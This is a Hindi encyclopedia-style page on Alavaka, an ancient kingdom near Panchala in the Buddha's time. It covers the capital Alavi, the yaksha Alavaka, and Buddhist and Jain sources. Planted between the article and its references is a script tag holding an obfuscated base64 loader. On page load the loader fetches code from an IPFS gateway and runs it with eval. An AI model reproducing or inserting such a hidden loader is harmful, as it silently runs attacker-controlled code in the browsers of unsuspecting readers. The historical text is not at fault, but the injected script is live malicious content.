आलवक

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

आलवक गौतमबुद्ध के समय[1] पूर्व-पांचाल में स्थित एक राज्य था।

  • यह कान्यकुब्ज से पूर्व की ओर संभवत: गाजीपुर के निकटवर्ती प्रदेश का नाम था।[2]
  • चीनी पर्यटक युवानच्वांग ने आलवक देश को शायद चंचु कहा है। इसकी राजधानी सुत्तनिपात में आलवी बताई गई है[3] जो उवास गदसाओ नामक ग्रंथ[4] की आलभिया या आलंभिका जान पड़ती है।
  • होर्नल के अनुसार आलवी की गणना अभिधानप्पदीपिका में बीस उत्तर-भारतीय नगरों के अंतर्गत की गई है।
  • जैन-ग्रंथ कल्पसूत्र में उल्लेख है कि तीर्थंकर महावीर ने आलविका में एक वर्षाकाल व्यतीत किया था।
  • सुत्तनिपात[5] में आलवक को यक्ष-देश माना है और यहाँ का देवता एक यक्ष को बतलाया गया है जो आलवक पंचाल-खंड नाम से प्रसिद्ध था।
  • यक्ष बड़ा क्रोधी था किंतु तथागत के शांत स्वभाव के सामने उसे पराजित होना पड़ा था।
  • यक्ष उत्तरी भारत की कोई अनार्यजाति थी जिसका उल्लेख महाभारत में अनेक स्थलों पर है। शिखंडी की मनोरंजक कथा [6] में एक यक्ष को पांचाल-देश के अंतर्गत[7] वन में निवास करते हुए वर्णित किया गया है।
  • आलवक में चुल्लवग्ग[8] में आलवी में अग्गालव नामक बौद्ध मंदिर का उल्लेख है। संभव है कि इस देश और इसकी राजधानी का नाम संस्कृत अटवी का प्राकृत रूप हो।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. पांचवी-छठी शती ई. पू.
  2. वाटर्स- युवानच्वांग, जिल्द. 2,61,340।
  3. सुत्तनिपा, दि बुक आव किंडरेड सेइंग्ज पृ. 275
  4. भाग-2, पृष्ठ 103
  5. सुत्तनिपात 10,2,45
  6. भीष्म-पर्व
  7. कांपिल्य के निकट
  8. 6, 17

बाहरी कड़ियाँ

संबंधित लेख